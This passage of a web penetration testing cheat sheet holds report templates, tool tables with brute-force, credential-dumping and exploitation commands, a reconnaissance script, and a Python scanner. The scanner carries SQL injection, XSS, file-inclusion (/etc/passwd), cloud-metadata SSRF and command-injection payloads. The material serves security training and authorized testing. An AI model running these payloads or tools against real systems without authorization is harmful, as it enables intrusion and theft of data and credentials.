- CWE: CWE-89
- CVE: CVE-2024-XXXX (if applicable)
- Affected Component: /path/to/vulnerable/endpoint
- Description: Detailed description of the vulnerability
- Impact: What an attacker can achieve
- Evidence: Proof of concept, screenshots, request/response
- Remediation: How to fix the issue
- References: Links to documentation, CVEs, etc.
REMEDIATION GUIDELINES
======================
Short-term fixes:
1. [Immediate actions]
Long-term solutions:
1. [Architectural changes]
Security controls to implement:
1. [Preventive controls]
2. [Detective controls]
3. [Corrective controls]
# Install
gem install dradis
# Start
dradis start
# Web interface at https://localhost:3000# Install
git clone https://github.com/SerpicoProject/Serpico.git
cd Serpico
bundle install
ruby serpico.rb# Docker
docker run -p 4242:4242 pwndoc/pwndoc# Penetration Test Report
## 1. Executive Summary
[1-2 paragraphs describing the engagement and key findings]
**Total Findings:** X
- Critical: X
- High: X
- Medium: X
- Low: X
- Informational: X
## 2. Scope
- In-scope: [domains, IP ranges, applications]
- Out-of-scope: [excluded items]
- Testing dates: [start date] to [end date]
## 3. Methodology
- Phase 1: Reconnaissance
- Phase 2: Scanning & Enumeration
- Phase 3: Vulnerability Assessment
- Phase 4: Exploitation
- Phase 5: Post-Exploitation
- Phase 6: Reporting
## 4. Findings
### 4.1 [Finding Title]
**Severity:** Critical/High/Medium/Low/Info
**CVSS:** X.X (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
**CWE:** CWE-89
**Affected Component:** [URL/path]
**Description:**
[Detailed description]
**Impact:**
[What an attacker can achieve]
**Evidence:**Request: GET /vulnerable.php?id=1' UNION SELECT 1,2,3--
Response: {"id":1,"name":"admin","email":"admin@localhost"}
**Screenshot:**
**Remediation:**
[Step-by-step fix]
**References:**
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [CWE-89](https://cwe.mitre.org/data/definitions/89.html)
## 5. Remediation Summary
| Priority | Finding | Difficulty | Estimated Time |
|----------|---------|------------|----------------|
| Critical | SQL Injection | Medium | 2 hours |
| High | XSS | Easy | 1 hour |
| Medium | Missing HSTS | Easy | 30 minutes |
## 6. Appendix
- A. Tools Used
- B. Wordlists
- C. Raw Scan Results
#!/usr/bin/env python3
# report_generator.py
import json
import datetime
from jinja2 import Template
class PentestReport:
def __init__(self, target, tester, date=None):
self.target = target
self.tester = tester
self.date = date or datetime.datetime.now().strftime("%Y-%m-%d")
self.findings = []
self.scope = {}
self.summary = {}
def add_finding(self, finding):
self.findings.append(finding)
def generate_summary(self):
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
for f in self.findings:
severity_counts[f.get("severity", "info").lower()] += 1
self.summary = severity_counts
return severity_counts
def to_markdown(self):
template = Template("""
# Penetration Test Report: {{ target }}
## Executive Summary
**Date:** {{ date }}
**Tester:** {{ tester }}
### Summary of Findings
- Critical: {{ summary.critical }}
- High: {{ summary.high }}
- Medium: {{ summary.medium }}
- Low: {{ summary.low }}
- Info: {{ summary.info }}
## Findings
{% for finding in findings %}
### {{ loop.index }}. {{ finding.title }}
**Severity:** {{ finding.severity }}
**CVSS:** {{ finding.cvss }}
**Affected:** {{ finding.affected }}
**Description:**
{{ finding.description }}
**Impact:**
{{ finding.impact }}
**Evidence:**{{ finding.evidence }}
**Remediation:**
{{ finding.remediation }}
**References:**
{% for ref in finding.references %}
- {{ ref }}
{% endfor %}
---
{% endfor %}
""")
self.generate_summary()
return template.render(
target=self.target,
tester=self.tester,
date=self.date,
summary=self.summary,
findings=self.findings
)
def to_json(self):
self.generate_summary()
return json.dumps({
"metadata": {
"target": self.target,
"tester": self.tester,
"date": self.date
},
"summary": self.summary,
"findings": self.findings
}, indent=2)
# Example usage
if __name__ == "__main__":
report = PentestReport("target.com", "awjunaid")
report.add_finding({
"title": "SQL Injection in Login",
"severity": "critical",
"cvss": "9.8",
"affected": "/login",
"description": "The username parameter is vulnerable to SQL injection...",
"impact": "Attacker can bypass authentication and access all user data",
"evidence": "username=admin' OR '1'='1'--",
"remediation": "Use parameterized queries",
"references": ["https://owasp.org/SQLi"]
})
with open("report.md", "w") as f:
f.write(report.to_markdown())
with open("report.json", "w") as f:
f.write(report.to_json())
| Tool | Purpose | Command Example |
|---|---|---|
| Amass | Subdomain enumeration | amass enum -d target.com |
| Sublist3r | Subdomain discovery | sublist3r -d target.com |
| theHarvester | OSINT gathering | theHarvester -d target.com -b all |
| dnsrecon | DNS enumeration | dnsrecon -d target.com |
| massdns | High-performance DNS | massdns -r lists/resolvers.txt -t A domains.txt |
| shodan | Internet device search | shodan search hostname:target.com |
| censys | Certificate search | censys search target.com |
| Tool | Purpose | Command Example |
|---|---|---|
| Nmap | Port scanning | nmap -sV -sC target.com |
| Masscan | High-speed scanning | masscan -p1-65535 --rate=10000 target.com |
| Rustscan | Fast port scanner | rustscan -a target.com |
| Naabu | Port scanning | naabu -host target.com |
| Httpx | HTTP probing | httpx -l hosts.txt -title -tech-detect |
| Tool | Purpose | Command Example |
|---|---|---|
| Gobuster | Directory brute force | gobuster dir -u target.com -w wordlist.txt |
| FFUF | Web fuzzing | ffuf -u target.com/FUZZ -w wordlist.txt |
| Dirb | Directory scanner | dirb http://target.com |
| Wfuzz | Web fuzzer | wfuzz -c -z file,wordlist.txt target.com/FUZZ |
| Nikto | Web vulnerability scanner | nikto -h target.com |
| WhatWeb | Technology detection | whatweb target.com |
| WPScan | WordPress scanner | wpscan --url target.com |
| Joomscan | Joomla scanner | joomscan -u target.com |
| Droopescan | Drupal scanner | droopescan scan drupal -u target.com |
| Tool | Purpose | Command Example |
|---|---|---|
| Nuclei | Template-based scanner | nuclei -u target.com |
| OpenVAS | Vulnerability scanner | gvm-start |
| Nessus | Commercial scanner | nessuscli scan new |
| Wapiti | Web vulnerability scanner | wapiti -u https://target.com |
| Arachni | Web scanner | arachni https://target.com |
| Tool | Purpose | Command Example |
|---|---|---|
| Metasploit | Exploitation framework | msfconsole |
| SQLmap | SQL injection | sqlmap -u target.com?id=1 |
| Commix | Command injection | commix -u target.com?cmd=test |
| BeEF | Browser exploitation | beef |
| XSStrike | XSS scanner | xsstrike -u target.com?q=test |
| Dalfox | XSS scanner | dalfox url target.com?p=test |
| Tool | Purpose | Command Example |
|---|---|---|
| Hydra | Online brute force | hydra -l admin -P pass.txt target.com http-post-form |
| Medusa | Parallel brute force | medusa -h target.com -U users.txt -P pass.txt -M http |
| John | Offline password cracker | john --wordlist=rockyou.txt hash.txt |
| Hashcat | GPU password cracker | hashcat -m 0 -a 0 hash.txt rockyou.txt |
| CeWL | Custom wordlist generator | cewl https://target.com -w wordlist.txt |
| Tool | Purpose | Command Example |
|---|---|---|
| LinPEAS | Linux privilege escalation | ./linpeas.sh |
| WinPEAS | Windows privilege escalation | .\winPEAS.exe |
| Impacket | Network protocols | psexec.py user:pass@target |
| Mimikatz | Credential dumping | mimikatz.exe |
| BloodHound | Active Directory mapping | bloodhound-python -u user -p pass -d domain.local |
| Tool | Purpose | Command Example |
|---|---|---|
| Burp Suite | Web proxy | Start from Applications menu |
| ZAP | Web proxy | zaproxy |
| Mitmproxy | CLI proxy | mitmproxy |
| Proxychains | Proxy chaining | proxychains nmap target.com |
| Wordlist | Location | Description |
|---|---|---|
| rockyou.txt | /usr/share/wordlists/rockyou.txt |
Common passwords |
| SecLists | /usr/share/seclists |
Comprehensive wordlists |
| dirb common | /usr/share/wordlists/dirb/common.txt |
Common directories |
| dirbuster | /usr/share/wordlists/dirbuster |
Directory lists |
| fuzzdb | /usr/share/fuzzdb |
Attack payloads |
| Platform | URL | Description |
|---|---|---|
| PortSwigger Web Security Academy | https://portswigger.net/web-security | Free XSS, SQLi, SSRF labs |
| OWASP WebGoat | https://github.com/WebGoat/WebGoat | Vulnerable web app |
| OWASP Juice Shop | https://github.com/juice-shop/juice-shop | Modern vulnerable app |
| DVWA | http://www.dvwa.co.uk/ | Damn Vulnerable Web App |
| bWAPP | http://www.itsecgames.com/ | Buggy web app |
| Mutillidae | https://github.com/webpwnized/mutillidae | OWASP Mutillidae II |
| Platform | URL | Description |
|---|---|---|
| HackTheBox | https://www.hackthebox.com | Realistic machines |
| TryHackMe | https://tryhackme.com | Guided learning |
| PentesterLab | https://pentesterlab.com | Hands-on exercises |
| PentesterAcademy | https://www.pentesteracademy.com | Video courses |
| Offensive Security Proving Grounds | https://www.offensive-security.com/labs/ | OSCP practice |
| VulnHub | https://www.vulnhub.com | Downloadable VMs |
| Platform | URL | Focus |
|---|---|---|
| CTFtime | https://ctftime.org | CTF calendar & rankings |
| PicoCTF | https://picoctf.org | Beginner-friendly |
| OverTheWire | https://overthewire.org | WarGames |
| RingZer0 | https://ringzer0ctf.com | CTF challenges |
| Hacker101 | https://www.hacker101.com | Bug bounty training |
| Platform | URL |
|---|---|
| HackerOne | https://www.hackerone.com |
| Bugcrowd | https://www.bugcrowd.com |
| Intigriti | https://www.intigriti.com |
| YesWeHack | https://www.yeswehack.com |
| Synack | https://www.synack.com |
| Title | Author | Focus |
|---|---|---|
| The Web Application Hacker's Handbook | Stuttard & Pinto | Web app testing |
| OWASP Testing Guide | OWASP | Comprehensive methodology |
| Penetration Testing: A Hands-On Introduction | Georgia Weidman | General pentesting |
| Red Team Field Manual | Ben Clark | Quick reference |
| Blue Team Field Manual | Alan White | Defense reference |
| Hacking: The Art of Exploitation | Jon Erickson | Technical deep dive |
| Resource | URL | Focus |
|---|---|---|
| OWASP | https://owasp.org | Web security |
| HackTricks | https://book.hacktricks.xyz | Pentesting techniques |
| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | Payload collection |
| GTFOBins | https://gtfobins.github.io | Linux binary exploitation |
| LOLBAS | https://lolbas-project.github.io | Windows binary exploitation |
| Exploit-DB | https://www.exploit-db.com | Exploit database |
| CVE Details | https://www.cvedetails.com | CVE database |
| MITRE ATT&CK | https://attack.mitre.org | Adversary tactics |
| Channel | Focus |
|---|---|
| IppSec | HackTheBox walkthroughs |
| The Cyber Mentor | Pentesting tutorials |
| STÖK | Bug bounty |
| HackerSploit | Security tutorials |
| John Hammond | CTF walkthroughs |
| LiveOverflow | Technical deep dives |
| Certification | Provider | Focus |
|---|---|---|
| OSCP | Offensive Security | Hands-on pentesting |
| OSWP | Offensive Security | Wireless pentesting |
| OSWE | Offensive Security | Web app pentesting |
| OSEP | Offensive Security | Advanced evasion |
| CEH | EC-Council | Ethical hacking |
| eWPT | eLearnSecurity | Web pentesting |
| eCPPT | eLearnSecurity | Network pentesting |
| PNPT | TCM Security | Practical pentesting |
| GPEN | GIAC | Network pentesting |
| GWAPT | GIAC | Web app pentesting |
| CISSP | ISC² | Security management |
#!/bin/bash
# recon.sh - Complete reconnaissance script
# Usage: ./recon.sh target.com
TARGET="$1"
OUTDIR="recon_${TARGET}_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTDIR"
cd "$OUTDIR"
echo "[*] Starting reconnaissance against $TARGET"
echo "[*] Output directory: $OUTDIR"
# 1. WHOIS
echo "[*] WHOIS lookup..."
whois "$TARGET" > whois.txt 2>&1
# 2. DNS enumeration
echo "[*] DNS enumeration..."
dig "$TARGET" ANY +noall +answer > dns_any.txt
dig "$TARGET" MX +short > dns_mx.txt
dig "$TARGET" NS +short > dns_ns.txt
dig "$TARGET" TXT +short > dns_txt.txt
# Zone transfer attempt
for ns in $(cat dns_ns.txt); do
echo "[*] Attempting zone transfer from $ns"
dig AXFR "$TARGET" "@$ns" >> zonetransfer.txt 2>&1
done
# 3. Subdomain enumeration
echo "[*] Subdomain enumeration..."
sublist3r -d "$TARGET" -o sublist3r.txt > /dev/null 2>&1
amass enum -passive -d "$TARGET" -o amass.txt > /dev/null 2>&1
cat sublist3r.txt amass.txt 2>/dev/null | sort -u > subdomains.txt
# 4. HTTP probing
echo "[*] HTTP probing..."
if [ -f subdomains.txt ]; then
httpx -l subdomains.txt -title -tech-detect -status-code -o httpx.txt
fi
# 5. Technology detection
echo "[*] Technology detection..."
whatweb "https://$TARGET" --log-json=whatweb.json > /dev/null 2>&1
wafw00f "https://$TARGET" > waf.txt 2>&1
# 6. HTTP headers
echo "[*] HTTP headers..."
curl -sI "https://$TARGET" > headers.txt
# 7. robots.txt & sitemap
echo "[*] robots.txt and sitemap..."
curl -s "https://$TARGET/robots.txt" > robots.txt
curl -s "https://$TARGET/sitemap.xml" > sitemap.xml
# 8. Wayback URLs
echo "[*] Wayback Machine URLs..."
waybackurls "$TARGET" > wayback.txt
grep "=" wayback.txt > wayback_params.txt
# 9. Port scanning (quick)
echo "[*] Quick port scan..."
nmap -T4 -F --open -oN nmap_quick.txt "$TARGET"
# 10. Generate report
echo "[*] Generating report..."
cat > report.md << EOF
# Reconnaissance Report: $TARGET
## Date
$(date)
## WHOIS Summary
\`\`\`
$(head -20 whois.txt)
\`\`\`
## DNS Records
### Name Servers
$(cat dns_ns.txt)
### Mail Servers
$(cat dns_mx.txt)
### TXT Records
$(cat dns_txt.txt)
## Subdomains Found
$(wc -l subdomains.txt 2>/dev/null || echo "0") subdomains found
\`\`\`
$(head -20 subdomains.txt 2>/dev/null)
\`\`\`
## Technologies Detected
\`\`\`
$(cat whatweb.json 2>/dev/null | jq -r '.[] | "\(.plugin): \(.version // "unknown")"' 2>/dev/null)
\`\`\`
## Security Headers
\`\`\`
$(cat headers.txt)
\`\`\`
## Open Ports
\`\`\`
$(grep "open" nmap_quick.txt 2>/dev/null | head -20)
\`\`\`
## Interesting URLs from Wayback
\`\`\`
$(head -20 wayback_params.txt 2>/dev/null)
\`\`\`
EOF
echo "[+] Recon complete! Results in $OUTDIR"
echo "[+] Report: $OUTDIR/report.md"#!/usr/bin/env python3
# web_scanner.py - Multi-vulnerability web scanner
# Usage: python3 web_scanner.py -u https://target.com
import argparse
import requests
import urllib.parse
import re
import sys
from concurrent.futures import ThreadPoolExecutor
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class WebScanner:
def __init__(self, base_url, threads=10, timeout=10):
self.base_url = base_url.rstrip('/')
self.threads = threads
self.timeout = timeout
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) WebScanner/1.0'
})
self.session.verify = False
self.findings = []
# Payloads
self.sqli_payloads = [
"' OR '1'='1",
"' OR 1=1--",
"1' AND '1'='1",
"1' AND '1'='2",
"1' UNION SELECT NULL--",
"1' UNION SELECT NULL,NULL--",
"1' AND SLEEP(5)--",
"1' WAITFOR DELAY '00:00:05'--"
]
self.xss_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert(1)>",
"<svg onload=alert(1)>",
"javascript:alert(1)",
"\"><script>alert(1)</script>"
]
self.lfi_payloads = [
"../../../etc/passwd",
"../../../../etc/passwd",
"..\\..\\..\\windows\\win.ini",
"../../../etc/passwd%00",
"../../../etc/passwd%00.png"
]
self.ssrf_payloads = [
"http://127.0.0.1/",
"http://localhost/",
"http://169.254.169.254/latest/meta-data/",
"http://[::1]/",
"file:///etc/passwd"
]
self.cmdi_payloads = [
"; id",
"| id",
"&& id",
"`id`",
"$(id)",
"; sleep 5"
]
def discover_params(self):
"""Discover parameters from URL"""
parsed = urllib.parse.urlparse(self.base_url)
params = urllib.parse.parse_qs(parsed.query)
discovered = list(params.keys())
# Common parameter names to test
common_params = ['id', 'page', 'file', 'url', 'path', 'q', 'search',
'query', 'name', 'user', 'username', 'email', 'pass',
'password', 'redirect', 'return', 'next', 'view',
'action', 'cat', 'category']
# Add common params if none discovered
if not discovered:
discovered = common_params
return discovered
def test_sqli(self, url, param):
"""Test SQL injection"""
for payload in self.sqli_payloads:
try:
test_url = f"{url}?{param}={urllib.parse.quote(payload)}"
start = time.time()
resp = self.session.get(test_url, timeout=self.timeout)
elapsed = time.time() - start
# Check for time-based
if elapsed > 4 and 'sleep' in payload.lower():
self.add_finding('SQLi', param, payload, 'Time-based blind')
return
# Check for error-based
if any(err in resp.text.lower() for err in
['sql', 'mysql', 'syntax error', 'ora-', 'microsoft ole db']):
self.add_finding('SQLi', param, payload, 'Error-based')
return
# Check for boolean-based
true_payload = f"1' AND '1'='1"
false_payload = f"1' AND '1'='2"
true_resp = self.session.get(f"{url}?{param}={true_payload}")
false_resp = self.session.get(f"{url}?{param}={false_payload}")
if len(true_resp.text) != len(false_resp.text):
self.add_finding('SQLi', param, 'Boolean-based',
'Different response lengths')
return
except Exception as e:
continue
def test_xss(self, url, param):
"""Test Cross-Site Scripting"""
for payload in self.xss_payloads:
try:
test_url = f"{url}?{param}={urllib.parse.quote(payload)}"
resp = self.session.get(test_url, timeout=self.timeout)
# Check if payload is reflected
if payload in resp.text or urllib.parse.quote(payload) in resp.text:
self.add_finding('XSS', param, payload, 'Reflected')
return
except Exception as e:
continue
def test_lfi(self, url, param):
"""Test Local File Inclusion"""
for payload in self.lfi_payloads:
try:
test_url = f"{url}?{param}={urllib.parse.quote(payload)}"
resp = self.session.get(test_url, timeout=self.timeout)
# Check for file contents
if re.search(r'root:.*:0:0:|\[extensions\]|for 16-bit app', resp.text):
self.add_finding('LFI', param, payload, 'File read')
return
except Exception as e:
continue
def test_ssrf(self, url, param):
"""Test Server-Side Request Forgery"""
for payload in self.ssrf_payloads:
try:
test_url = f"{url}?{param}={urllib.parse.quote(payload)}"
resp = self.session.get(test_url, timeout=self.timeout)
# Check for internal/cloud metadata
if re.search(r'ami-id|instance-id|localhost|root:', resp.text, re.I):
self.add_finding('SSRF', param, payload, 'Internal access')
return
except Exception as e:
continue
def test_cmdi(self, url, param):
"""Test Command Injection"""
for payload in self.cmdi_payloads:
try:
test_url = f"{url}?{param}={urllib.parse.quote(payload)}"
start = time.time()
resp = self.session.get(test_url, timeout=self.timeout)
elapsed = time.time() - start
# Check for time-based
if elapsed > 4 and 'sleep' in payload:
self.add_finding('Command Injection', param, payload, 'Time-based')
return
# Check for command output
if re.search(r'uid=\d+|gid=\d+|root:', resp.text):
self.add_finding('Command Injection', param, payload, 'Command output')
return
except Exception as e:
continue
def check_headers(self):
"""Check security headers"""
try:
resp = self.session.get(self.base_url, timeout=self.timeout)
headers = {k.lower(): v for k, v in resp.headers.items()}
security_headers = {
'strict-transport-security': 'HSTS',
'content-security-policy': 'CSP',
'x-frame-options': 'X-Frame-Options',
'x-content-type-options': 'X-Content-Type-Options',
'x-xss-protection': 'X-XSS-Protection',
'referrer-policy': 'Referrer-Policy'
}
missing = []
for header, name in security_headers.items():
if header not in headers:
missing.append(name)
if missing:
self.findings.append({
'type': 'Missing Security Headers',
'details': f"Missing: {', '.join(missing)}"
})
except Exception as e:
print(f"[-] Header check failed: {e}")
def add_finding(self, vuln_type, param, payload, details):
"""Add finding to results"""
finding = {
'type': vuln_type,
'parameter': param,
'payload': payload,
'details': details,
'url': self.base_url
}
self.findings.append(finding)
print(f"[!] Found: {vuln_type} on parameter '{param}' - {details}")
def scan(self):
"""Main scan function"""
print(f"[*] Starting scan on {self.base_url}")
# Discover parameters
params = self.discover_params()
print(f"[*] Testing parameters: {', '.join(params)}")
# Check headers
self.check_headers()
# Test each parameter
for param in params:
print(f"[*] Testing parameter: {param}")
# Run all tests
self.test_sqli(self.base_url, param)
self.test_xss(self.base_url, param)
self.test_lfi(self.base_url, param)
self.test_ssrf(self.base_url, param)
self.test_cmdi(self.base_url, param)
# Print summary
print("\n" + "="*50)
print("SCAN SUMMARY")
print("="*50)
print(f"Total findings: {len(self.findings)}")
for i, finding in enumerate(self.findings, 1):
print(f"\n{i}. {finding['type']}")
print(f" Parameter: {finding.get('parameter', 'N/A')}")
print(f" Details: {finding['details']}")
def main():
parser = argparse.ArgumentParser(description='Web Vulnerability Scanner')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-t', '--threads', type=int, default=10, help='Threads')
parser.add_argument('--timeout', type=int, default=10, help='Timeout')
args = parser.parse_args()
scanner = WebScanner(args.url, args.threads, args.timeout)
scanner.scan()
if __name__ == '__main__':
import time
main()This comprehensive web penetration testing cheat sheet covers the essential tools, techniques, and methodologies for ethical hacking and security testing. Remember:
- Always obtain proper authorization before testing
- Stay within scope defined in the rules of engagement
- Document everything for evidence and reporting
- Follow responsible disclosure when finding vulnerabilities
- Continuous learning - the security landscape constantly evolves
- Set up a practice lab (DVWA, WebGoat, HackTheBox)
- Master the core tools (Burp Suite, Nmap, SQLmap)
- Learn programming (Python, Bash, JavaScript)
- Get certified (OSCP, PNPT, etc.)
- Participate in bug bounty programs
- Stay updated with security news and CVEs
Remember that with great power comes great responsibility. Use these skills to make the internet safer, not to cause harm. Always test with permission and report vulnerabilities responsibly.
© 2025 awjunaid.com - For authorized security testing only